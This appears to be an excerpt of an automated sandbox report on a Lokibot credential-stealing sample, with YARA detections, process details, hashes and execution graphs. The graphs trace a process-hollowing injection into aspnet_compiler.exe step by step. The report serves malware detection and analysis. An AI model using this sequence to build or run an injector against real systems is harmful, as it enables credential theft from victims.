                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:11:08:45
                              Start date:05/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                              Imagebase:0x3e0000
                              File size:56'368 bytes
                              MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:2
                              Start time:11:08:45
                              Start date:05/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                              Imagebase:0x940000
                              File size:56'368 bytes
                              MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:moderate
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:19.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:2
                                execution_graph 3348 c88f18 VirtualAllocEx 3349 c88fcf 3348->3349 3350 c889b8 3351 c88a45 CreateProcessW 3350->3351 3353 c88bac 3351->3353 3353->3353 3340 c89160 ResumeThread 3341 c891e8 3340->3341 3342 c88e00 ReadProcessMemory 3343 c88ebf 3342->3343 3344 c89020 3345 c89089 3344->3345 3346 c8909e WriteProcessMemory 3344->3346 3345->3346 3347 c89100 3346->3347 3354 c88cf0 3355 c88d4e 3354->3355 3356 c88d63 Wow64SetThreadContext 3354->3356 3355->3356 3357 c88dac 3356->3357

                                Executed Functions

                                Function 00C87269 Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab93985123931c72189a9f0cd3d8e4755d7d94e3cbeeaa8cd625e20f58742ca9
                                • Instruction ID: 73ef8b9553e58aed4d8e41fbd7542a281543624a4e1a06c88a4eec12ac9b52ed
                                • Opcode Fuzzy Hash: ab93985123931c72189a9f0cd3d8e4755d7d94e3cbeeaa8cd625e20f58742ca9
                                • Instruction Fuzzy Hash: C6714E74E056298BDB68CF2ACD457DAB7F2AFC9300F20C1EAC50DA7254EB705A858F45
                                Function 00C875BA Relevance: .1, Instructions: 125COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8223d5ef40c9cb2adb3dcb66e2705055e045e915c47d652b2b75e8e6dda05c54
                                • Instruction ID: a113cb01a692d219726053a331f62d742806c9ff361cff1ecdce91c7e238facb
                                • Opcode Fuzzy Hash: 8223d5ef40c9cb2adb3dcb66e2705055e045e915c47d652b2b75e8e6dda05c54
                                • Instruction Fuzzy Hash: A8511874D056298FCB68DF25CD857DAB7F2BF89300F2085EA8109A7264EB309F818F45
                                Function 00C87666 Relevance: .1, Instructions: 114COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8691a196a6e18d442657f8eb438e9866e2d97b369e8c256fca5199018973c5f
                                • Instruction ID: eb9b377ab36bd5b9e211bc338c90c2d7f6c2726c3a0c266e26779ee9e5a06b71
                                • Opcode Fuzzy Hash: e8691a196a6e18d442657f8eb438e9866e2d97b369e8c256fca5199018973c5f
                                • Instruction Fuzzy Hash: F4510A74D056298FCB68DF25CD857DAB7F2AF89300F2095EA810DA7250EB309F918F55
                                Function 00C8747B Relevance: .1, Instructions: 106COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3ab751bf2626573a9237f336e72aaec5ffd30a4d34f5c7ff952d976271cbff6f
                                • Instruction ID: 08d36f50938f37dae6d84fa27a5c66792d0d6e441693dcac9daaa5be870a5ef4
                                • Opcode Fuzzy Hash: 3ab751bf2626573a9237f336e72aaec5ffd30a4d34f5c7ff952d976271cbff6f
                                • Instruction Fuzzy Hash: E8511B74E056298FCB68DF25CD857DAB7F2AF89300F2095EA810DA7254EB309F918F45
                                Function 00C874B9 Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b3d29e371f467aaae8ff6a5e0ecdeae90c4dfd7742a26e2739347b8ff4206f48
                                • Instruction ID: edde946cb545788dfa98689f73032948b9b2314e62458f5a6d84053879753d5e
                                • Opcode Fuzzy Hash: b3d29e371f467aaae8ff6a5e0ecdeae90c4dfd7742a26e2739347b8ff4206f48
                                • Instruction Fuzzy Hash: F2410974E056198FCBA8DF25CD857DAB7F2AF89300F2095EA810DA7254EB309E918F45
                                Function 00C87685 Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d68fd051e5cade60e2b2585f1f07d7691c32c58ba4afc3849046b06e466e8d5e
                                • Instruction ID: aa9f38affc79ed44c9560afc4c849c15d24e73c834f39289a441f1747428f1a2
                                • Opcode Fuzzy Hash: d68fd051e5cade60e2b2585f1f07d7691c32c58ba4afc3849046b06e466e8d5e
                                • Instruction Fuzzy Hash: C7410974E056298FCB68DF25CD856CAB7F2AF89300F2085EA810DA7254EB309F918F45
                                Function 00C8892D Relevance: 1.8, APIs: 1, Instructions: 270processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 46 c8892d-c88930 47 c889ae-c88a43 46->47 48 c88932-c889ad 46->48 50 c88a5a-c88a68 47->50 51 c88a45-c88a57 47->51 48->47 52 c88a6a-c88a7c 50->52 53 c88a7f-c88abb 50->53 51->50 52->53 54 c88abd-c88acc 53->54 55 c88acf-c88baa CreateProcessW 53->55 54->55 59 c88bac-c88bb2 55->59 60 c88bb3-c88c7c 55->60 59->60 69 c88c7e-c88ca7 60->69 70 c88cb2-c88cbd 60->70 69->70 74 c88cbe 70->74 74->74
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C88B97
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 5a6e4bd99cfa022b7fd78bf85823f795b06ed80a76771d4319ece9b4bccba181
                                • Instruction ID: 76af0b899844a147e33340e1ff189cf516970e38a70eaa73c686955a4a5bf7dd
                                • Opcode Fuzzy Hash: 5a6e4bd99cfa022b7fd78bf85823f795b06ed80a76771d4319ece9b4bccba181
                                • Instruction Fuzzy Hash: E5A1F275C402199FEB26DF64C880BDEBBF1AB09304F5094EAD548B7260DB749E85CF54
                                Function 00C889B8 Relevance: 1.7, APIs: 1, Instructions: 236processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 75 c889b8-c88a43 76 c88a5a-c88a68 75->76 77 c88a45-c88a57 75->77 78 c88a6a-c88a7c 76->78 79 c88a7f-c88abb 76->79 77->76 78->79 80 c88abd-c88acc 79->80 81 c88acf-c88baa CreateProcessW 79->81 80->81 85 c88bac-c88bb2 81->85 86 c88bb3-c88c7c 81->86 85->86 95 c88c7e-c88ca7 86->95 96 c88cb2-c88cbd 86->96 95->96 100 c88cbe 96->100 100->100
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C88B97
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 07431d02f1b1811bba21537e2d043259bf9a1f6d77ae91a6e5f6fe5ff8d66525
                                • Instruction ID: 16585431927c715ec14aeae520d8c310f3da4d900d209cbb97ed70515e33360b
                                • Opcode Fuzzy Hash: 07431d02f1b1811bba21537e2d043259bf9a1f6d77ae91a6e5f6fe5ff8d66525
                                • Instruction Fuzzy Hash: EE81AF74D0022DDFDF25DF69C940BDEBBB1AB49304F0494AAE548B7250DB709A89CF54
                                Function 00C8901E Relevance: 1.6, APIs: 1, Instructions: 111injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 101 c8901e-c89087 102 c89089-c8909b 101->102 103 c8909e-c890fe WriteProcessMemory 101->103 102->103 104 c89100-c89106 103->104 105 c89107-c89145 103->105 104->105
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C890EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: ea41d17998d964a49e53b89bdaa79c2378662c0e71878b616eee2ffec065dd06
                                • Instruction ID: 59bc53fed43e5b38f9414e8af6e0b6f3dd3179ace70323eeb45e32916fb1d4cb
                                • Opcode Fuzzy Hash: ea41d17998d964a49e53b89bdaa79c2378662c0e71878b616eee2ffec065dd06
                                • Instruction Fuzzy Hash: 694199B5D042589FCF10CFA9D984AEEFBF1BB09314F24902AE818B7210D375AA45CF64
                                Function 00C89020 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 108 c89020-c89087 109 c89089-c8909b 108->109 110 c8909e-c890fe WriteProcessMemory 108->110 109->110 111 c89100-c89106 110->111 112 c89107-c89145 110->112 111->112
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C890EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 49de42292263395d0b458a6256bca743c4243149f2aa105b7ed8260d2ab794e2
                                • Instruction ID: 61b04a97a795738cb004c306e3f28d9b1f6c3ebffbfe7a133a81243f015aa6df
                                • Opcode Fuzzy Hash: 49de42292263395d0b458a6256bca743c4243149f2aa105b7ed8260d2ab794e2
                                • Instruction Fuzzy Hash: 204168B5D042599FCF10CFA9D984AEEFBF1BB49314F24902AE818B7210D375AA45CB64
                                Function 00C88DF8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 115 c88df8-c88ebd ReadProcessMemory 117 c88ebf-c88ec5 115->117 118 c88ec6-c88f04 115->118 117->118
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C88EAD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 75ea86e00a62e5704374c75d283395753c3d25bdb8a0ecad76eae85dbea754dd
                                • Instruction ID: 0ef8b837977ad8c9cee18b7966c9423ab572c99d14003e7086783de3ae408dba
                                • Opcode Fuzzy Hash: 75ea86e00a62e5704374c75d283395753c3d25bdb8a0ecad76eae85dbea754dd
                                • Instruction Fuzzy Hash: 2A3188B9D04259DFCF10CFA9D980ADEFBB1BB19314F14A06AE814B7210D375A945CF68
                                Function 00C88E00 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 121 c88e00-c88ebd ReadProcessMemory 122 c88ebf-c88ec5 121->122 123 c88ec6-c88f04 121->123 122->123
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C88EAD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 2eee9b5687432183f9d24bd7322316db3e8a69866cc1757b60501cebcc0674c1
                                • Instruction ID: 301396799eedce6d3e64f8db26bc0ada13a7c31a75e63938a5d3f57c722470ce
                                • Opcode Fuzzy Hash: 2eee9b5687432183f9d24bd7322316db3e8a69866cc1757b60501cebcc0674c1
                                • Instruction Fuzzy Hash: FF3167B9D04258DFCF10CFAAD984ADEFBB5BB19310F14A06AE814B7210D375A945CF68
                                Function 00C88F10 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 126 c88f10-c88f12 127 c88f14-c88fcd VirtualAllocEx 126->127 128 c88fcf-c88fd5 127->128 129 c88fd6-c8900c 127->129 128->129
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C88FBD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 68320000ad4f52091024f8307f06c1dcd1d4a405bcb4504ed9888ae0cd1a4802
                                • Instruction ID: cba5c6f30b918990a74cb0a77be892fb392f49b5ae995571582c8c15d63312ba
                                • Opcode Fuzzy Hash: 68320000ad4f52091024f8307f06c1dcd1d4a405bcb4504ed9888ae0cd1a4802
                                • Instruction Fuzzy Hash: 6A3178B9D04258DFCF10CFA9D980A9EFBB1BB59310F14A02AE918B7310D775A905CF68
                                Function 00C88F18 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 132 c88f18-c88fcd VirtualAllocEx 133 c88fcf-c88fd5 132->133 134 c88fd6-c8900c 132->134 133->134
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C88FBD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a5753038a0ef58d8a6935adbf28671e0a016900019a1aa72367f8f6cc8139570
                                • Instruction ID: 8a208e7a9656c32c3f0f687dd94b90e74660da704a95455609ea7f31ce62a501
                                • Opcode Fuzzy Hash: a5753038a0ef58d8a6935adbf28671e0a016900019a1aa72367f8f6cc8139570
                                • Instruction Fuzzy Hash: A83157B9D04258DFCF10CFA9D984A9EFBB5BB09310F10A01AE914B7310D775A945CF69
                                Function 00C88CF0 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 137 c88cf0-c88d4c 138 c88d4e-c88d60 137->138 139 c88d63-c88daa Wow64SetThreadContext 137->139 138->139 140 c88dac-c88db2 139->140 141 c88db3-c88deb 139->141 140->141
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C88D9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 65f0b2b344a9a66eb204b0fd1c92270741ddf9eefb296d60d61f8ab95da5c2d6
                                • Instruction ID: 87f06de2ead247c1837fb7e81f0e5a2f4bed528474e614cf07fa55a961834d70
                                • Opcode Fuzzy Hash: 65f0b2b344a9a66eb204b0fd1c92270741ddf9eefb296d60d61f8ab95da5c2d6
                                • Instruction Fuzzy Hash: 1331CCB5D002599FCB10CFAAD584ADEFBF0BB08314F24802AE414B7240C778AA45CF54
                                Function 00C88CE8 Relevance: 1.6, APIs: 1, Instructions: 86threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 144 c88ce8-c88d4c 145 c88d4e-c88d60 144->145 146 c88d63-c88daa Wow64SetThreadContext 144->146 145->146 147 c88dac-c88db2 146->147 148 c88db3-c88deb 146->148 147->148
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C88D9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 4fa7f403c18eb7394f33c3d42b93b9c386aa7509166029c34e3fc89ce6b58ec9
                                • Instruction ID: 405dc93cb9608891934f4e91ef01f54d33d0a9978ad60c9e14b2b753417f77c9
                                • Opcode Fuzzy Hash: 4fa7f403c18eb7394f33c3d42b93b9c386aa7509166029c34e3fc89ce6b58ec9
                                • Instruction Fuzzy Hash: 9E31B9B5D00259DFCB14CFA9D584ADEFBF1BB08314F24906AE818B7250D778AA49CF54
                                Function 00C89158 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 151 c89158-c891e6 ResumeThread 154 c891e8-c891ee 151->154 155 c891ef-c8921d 151->155 154->155
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 00C891D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 15e52d198ab22b981294bfc3a9e619e2fa3fc25d1b3f1a60b839e8bdfc037425
                                • Instruction ID: 67c26296cb4e8fc16e3a3542101d9d6c2a4fe20e4700c4afc62bcdbc8d9f5751
                                • Opcode Fuzzy Hash: 15e52d198ab22b981294bfc3a9e619e2fa3fc25d1b3f1a60b839e8bdfc037425
                                • Instruction Fuzzy Hash: 70219AB8D042099FCB10CFA9D484ADEFBF4EB09314F24905AE918B3310D375A941CF68
                                Function 00C89160 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 158 c89160-c891e6 ResumeThread 159 c891e8-c891ee 158->159 160 c891ef-c8921d 158->160 159->160
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 00C891D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 4c5d5b210f7d84b24a854026eae8753d2346499221f1beeb26cfd5afb1f77458
                                • Instruction ID: d7549cbccdcb9117e73b363b1e889eb4dd666dbeaa2a1ee4c2e2260c1fda6ad3
                                • Opcode Fuzzy Hash: 4c5d5b210f7d84b24a854026eae8753d2346499221f1beeb26cfd5afb1f77458
                                • Instruction Fuzzy Hash: 912188B9D042199FCB10CFA9D584ADEFBF4EB49324F24905AE818B7310D375A945CFA8

                                Non-executed Functions

                                Function 00C80B78 Relevance: .2, Instructions: 169COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dddcee6a96b8d0bb49debb09350c3ef7f4beb76ef6178736d10bb355f8dbad7d
                                • Instruction ID: c9067d8b22ebcc1588d8375d658fe816bdc219d07b0747ebcf8de487dd746345
                                • Opcode Fuzzy Hash: dddcee6a96b8d0bb49debb09350c3ef7f4beb76ef6178736d10bb355f8dbad7d
                                • Instruction Fuzzy Hash: 21613C74E152459FEB48EF7AE840B9ABFF2BBC9300F14C129D004AB369DB785906DB50
                                Function 00C80B88 Relevance: .2, Instructions: 160COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d66794fd017f61062e7fd7ab52840cab96979cd571c722694daa3aed94a24d81
                                • Instruction ID: 90973165a9bc189b863a5fe2c8bc407c411a5a55efc08d0456934d58a164bc3f
                                • Opcode Fuzzy Hash: d66794fd017f61062e7fd7ab52840cab96979cd571c722694daa3aed94a24d81
                                • Instruction Fuzzy Hash: 4B611B74E15649DFEB48EF7AE840B9EBBF2BBC9300F14C129D014AB369DB7859059B40

                                Execution Graph

                                Execution Coverage:31.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:4.4%
                                Total number of Nodes:1846
                                Total number of Limit Nodes:92
                                execution_graph 9723 40c640 9750 404bee 9723->9750 9726 40c70f 9727 404bee 6 API calls 9728 40c66b 9727->9728 9729 40c708 9728->9729 9731 404bee 6 API calls 9728->9731 9730 402bab 2 API calls 9729->9730 9730->9726 9732 40c683 9731->9732 9733 40c701 9732->9733 9734 404bee 6 API calls 9732->9734 9735 402bab 2 API calls 9733->9735 9738 40c694 9734->9738 9735->9729 9736 40c6f8 9737 402bab 2 API calls 9736->9737 9737->9733 9738->9736 9757 40c522 9738->9757 9740 40c6a9 9741 40c6ef 9740->9741 9743 405872 4 API calls 9740->9743 9742 402bab 2 API calls 9741->9742 9742->9736 9744 40c6c5 9743->9744 9745 405872 4 API calls 9744->9745 9746 40c6d5 9745->9746 9747 405872 4 API calls 9746->9747 9748 40c6e7 9747->9748 9749 402bab 2 API calls 9748->9749 9749->9741 9751 402b7c 2 API calls 9750->9751 9753 404bff 9751->9753 9752 404c3b 9752->9726 9752->9727 9753->9752 9754 4031e5 4 API calls 9753->9754 9755 404c28 9754->9755 9755->9752 9756 402bab 2 API calls 9755->9756 9756->9752 9758 402b7c 2 API calls 9757->9758 9759 40c542 9758->9759 9759->9740 9760 405941 9761 4031e5 4 API calls 9760->9761 9762 405954 9761->9762 8327 409046 8340 413b28 8327->8340 8329 40906d 8331 405b6f 6 API calls 8329->8331 8330 40904e 8330->8329 8332 403fbf 7 API calls 8330->8332 8333 40907c 8331->8333 